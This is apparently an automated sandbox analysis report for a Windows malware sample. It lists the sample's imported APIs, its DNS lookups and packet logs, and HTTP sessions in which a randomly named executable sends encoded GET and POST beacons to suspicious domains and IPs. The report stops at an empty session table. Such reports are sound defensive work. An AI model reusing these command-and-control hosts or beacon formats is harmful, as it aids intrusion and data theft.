KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:17:56.427198887 CET	54296	53	192.168.2.7	162.159.36.2
Jan 10, 2025 19:17:56.431986094 CET	53	54296	162.159.36.2	192.168.2.7
Jan 10, 2025 19:17:56.432065010 CET	54296	53	192.168.2.7	162.159.36.2
Jan 10, 2025 19:17:56.436966896 CET	53	54296	162.159.36.2	192.168.2.7
Jan 10, 2025 19:17:56.948143959 CET	54296	53	192.168.2.7	162.159.36.2
Jan 10, 2025 19:17:56.953170061 CET	53	54296	162.159.36.2	192.168.2.7
Jan 10, 2025 19:17:56.953238964 CET	54296	53	192.168.2.7	162.159.36.2
Jan 10, 2025 19:18:03.076930046 CET	54317	80	192.168.2.7	23.167.152.41
Jan 10, 2025 19:18:03.081818104 CET	80	54317	23.167.152.41	192.168.2.7
Jan 10, 2025 19:18:03.082073927 CET	54317	80	192.168.2.7	23.167.152.41
Jan 10, 2025 19:18:03.092688084 CET	54317	80	192.168.2.7	23.167.152.41
Jan 10, 2025 19:18:03.097522020 CET	80	54317	23.167.152.41	192.168.2.7
Jan 10, 2025 19:18:03.462927103 CET	80	54317	23.167.152.41	192.168.2.7
Jan 10, 2025 19:18:03.463129997 CET	54317	80	192.168.2.7	23.167.152.41
Jan 10, 2025 19:18:03.464689016 CET	54317	80	192.168.2.7	23.167.152.41
Jan 10, 2025 19:18:03.469490051 CET	80	54317	23.167.152.41	192.168.2.7
Jan 10, 2025 19:18:18.516061068 CET	54318	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:18.520910978 CET	80	54318	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:18.521034956 CET	54318	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:18.538081884 CET	54318	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:18.542946100 CET	80	54318	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:18.996052027 CET	80	54318	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:18.996301889 CET	80	54318	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:18.996531010 CET	54318	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:20.044959068 CET	54318	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:21.065268040 CET	54319	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:21.070513010 CET	80	54319	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:21.070677042 CET	54319	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:21.091377974 CET	54319	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:21.096347094 CET	80	54319	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:21.545516014 CET	80	54319	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:21.545583010 CET	80	54319	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:21.545643091 CET	54319	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:22.607306957 CET	54319	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:23.626198053 CET	54320	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:23.631321907 CET	80	54320	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:23.631448984 CET	54320	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:23.647077084 CET	54320	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:23.652034044 CET	80	54320	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:23.652100086 CET	80	54320	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:24.112307072 CET	80	54320	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:24.112499952 CET	80	54320	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:24.112565041 CET	54320	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:25.163961887 CET	54320	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:26.184861898 CET	54321	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:26.189858913 CET	80	54321	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:26.189944983 CET	54321	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:26.200822115 CET	54321	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:26.205796957 CET	80	54321	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:32.736599922 CET	80	54321	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:32.737611055 CET	80	54321	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:32.737726927 CET	54321	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:32.739840984 CET	54321	80	192.168.2.7	13.248.169.48
Jan 10, 2025 19:18:32.744748116 CET	80	54321	13.248.169.48	192.168.2.7
Jan 10, 2025 19:18:54.486821890 CET	54322	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:54.491744995 CET	80	54322	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:54.492547035 CET	54322	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:54.672643900 CET	54322	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:54.677525043 CET	80	54322	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:55.453870058 CET	80	54322	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:55.453955889 CET	80	54322	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:55.454202890 CET	54322	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:56.185731888 CET	54322	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:57.269099951 CET	54323	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:57.274147034 CET	80	54323	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:57.274713993 CET	54323	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:57.325619936 CET	54323	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:57.330563068 CET	80	54323	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:58.187635899 CET	80	54323	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:58.187823057 CET	80	54323	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:58.187887907 CET	54323	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:58.842156887 CET	54323	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:59.861999989 CET	54324	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:59.867014885 CET	80	54324	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:59.867141962 CET	54324	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:59.882857084 CET	54324	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:18:59.887763977 CET	80	54324	154.23.178.231	192.168.2.7
Jan 10, 2025 19:18:59.887805939 CET	80	54324	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:00.777610064 CET	80	54324	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:00.777726889 CET	80	54324	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:00.777959108 CET	54324	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:01.388748884 CET	54324	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:02.408250093 CET	54325	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:02.413301945 CET	80	54325	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:02.413388968 CET	54325	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:02.425019979 CET	54325	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:02.429882050 CET	80	54325	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:03.329010010 CET	80	54325	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:03.329050064 CET	80	54325	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:03.329293013 CET	54325	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:03.334347963 CET	54325	80	192.168.2.7	154.23.178.231
Jan 10, 2025 19:19:03.339220047 CET	80	54325	154.23.178.231	192.168.2.7
Jan 10, 2025 19:19:08.378966093 CET	54326	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:08.383810043 CET	80	54326	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:08.383899927 CET	54326	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:08.400428057 CET	54326	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:08.405261993 CET	80	54326	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:08.999353886 CET	80	54326	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:08.999401093 CET	80	54326	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:08.999484062 CET	54326	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:09.904531002 CET	54326	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:10.923557043 CET	54327	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:10.928427935 CET	80	54327	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:10.928514957 CET	54327	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:10.946492910 CET	54327	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:10.951344013 CET	80	54327	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:11.566744089 CET	80	54327	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:11.566871881 CET	80	54327	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:11.571387053 CET	54327	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:12.451225042 CET	54327	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:13.470357895 CET	54328	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:13.475148916 CET	80	54328	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:13.475478888 CET	54328	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:13.491508007 CET	54328	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:13.496356010 CET	80	54328	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:13.496449947 CET	80	54328	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:14.114927053 CET	80	54328	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:14.115207911 CET	80	54328	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:14.115319014 CET	54328	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:14.998153925 CET	54328	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:16.018089056 CET	54329	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:16.022927046 CET	80	54329	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:16.023091078 CET	54329	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:16.038676977 CET	54329	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:16.044166088 CET	80	54329	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:16.649893045 CET	80	54329	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:16.650060892 CET	80	54329	130.185.109.77	192.168.2.7
Jan 10, 2025 19:19:16.650135994 CET	54329	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:16.653340101 CET	54329	80	192.168.2.7	130.185.109.77
Jan 10, 2025 19:19:16.658282042 CET	80	54329	130.185.109.77	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:17:56.426547050 CET	53	59714	162.159.36.2	192.168.2.7
Jan 10, 2025 19:17:57.371016026 CET	53	51313	1.1.1.1	192.168.2.7
Jan 10, 2025 19:18:02.368851900 CET	59901	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:18:03.070314884 CET	53	59901	1.1.1.1	192.168.2.7
Jan 10, 2025 19:18:18.502438068 CET	51890	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:18:18.513511896 CET	53	51890	1.1.1.1	192.168.2.7
Jan 10, 2025 19:18:37.755351067 CET	49541	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:18:37.769030094 CET	53	49541	1.1.1.1	192.168.2.7
Jan 10, 2025 19:18:46.048491001 CET	54853	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:18:46.057908058 CET	53	54853	1.1.1.1	192.168.2.7
Jan 10, 2025 19:18:54.149763107 CET	50804	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:18:54.288964033 CET	53	50804	1.1.1.1	192.168.2.7
Jan 10, 2025 19:19:08.345901012 CET	63244	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:19:08.376514912 CET	53	63244	1.1.1.1	192.168.2.7
Jan 10, 2025 19:19:22.367851973 CET	55322	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:19:22.380876064 CET	53	55322	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 19:18:02.368851900 CET	192.168.2.7	1.1.1.1	0x8973	Standard query (0)	www.75178.club	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:18.502438068 CET	192.168.2.7	1.1.1.1	0x62f5	Standard query (0)	www.bcg.services	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:37.755351067 CET	192.168.2.7	1.1.1.1	0x848	Standard query (0)	www.egldfi.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:46.048491001 CET	192.168.2.7	1.1.1.1	0x3360	Standard query (0)	www.betmatchx.online	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:54.149763107 CET	192.168.2.7	1.1.1.1	0xd4ad	Standard query (0)	www.43kdd.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:19:08.345901012 CET	192.168.2.7	1.1.1.1	0xb060	Standard query (0)	www.lgdiamonds.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:19:22.367851973 CET	192.168.2.7	1.1.1.1	0x2259	Standard query (0)	www.jalan2.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 19:18:03.070314884 CET	1.1.1.1	192.168.2.7	0x8973	No error (0)	www.75178.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:18:03.070314884 CET	1.1.1.1	192.168.2.7	0x8973	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:18:03.070314884 CET	1.1.1.1	192.168.2.7	0x8973	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		23.167.152.41	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:18.513511896 CET	1.1.1.1	192.168.2.7	0x62f5	No error (0)	www.bcg.services		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:18.513511896 CET	1.1.1.1	192.168.2.7	0x62f5	No error (0)	www.bcg.services		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:37.769030094 CET	1.1.1.1	192.168.2.7	0x848	Name error (3)	www.egldfi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:46.057908058 CET	1.1.1.1	192.168.2.7	0x3360	Name error (3)	www.betmatchx.online	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:18:54.288964033 CET	1.1.1.1	192.168.2.7	0xd4ad	No error (0)	www.43kdd.top	43kdd.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:18:54.288964033 CET	1.1.1.1	192.168.2.7	0xd4ad	No error (0)	43kdd.top		154.23.178.231	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:19:08.376514912 CET	1.1.1.1	192.168.2.7	0xb060	No error (0)	www.lgdiamonds.info		130.185.109.77	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:19:22.380876064 CET	1.1.1.1	192.168.2.7	0x2259	No error (0)	www.jalan2.online	jalan2.online		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:19:22.380876064 CET	1.1.1.1	192.168.2.7	0x2259	No error (0)	jalan2.online		108.181.189.7	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.75178.club

www.bcg.services

www.43kdd.top

www.lgdiamonds.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	54317	23.167.152.41	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:03.092688084 CET	483	OUT	GET /vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.75178.club User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	54318	13.248.169.48	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:18.538081884 CET	749	OUT	POST /5onp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 219 Host: www.bcg.services Origin: http://www.bcg.services Referer: http://www.bcg.services/5onp/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4e 51 48 4d 78 4a 2b 66 49 44 34 43 72 6d 51 44 6a 4f 51 70 75 79 4a 4d 59 34 34 6e 52 32 79 4a 55 55 38 46 68 50 72 55 4a 5a 75 38 6e 69 6a 33 67 3d 3d Data Ascii: Ebq4kd=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31NQHMxJ+fID4CrmQDjOQpuyJMY44nR2yJUU8FhPrUJZu8nij3g==
Jan 10, 2025 19:18:18.996052027 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	54319	13.248.169.48	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
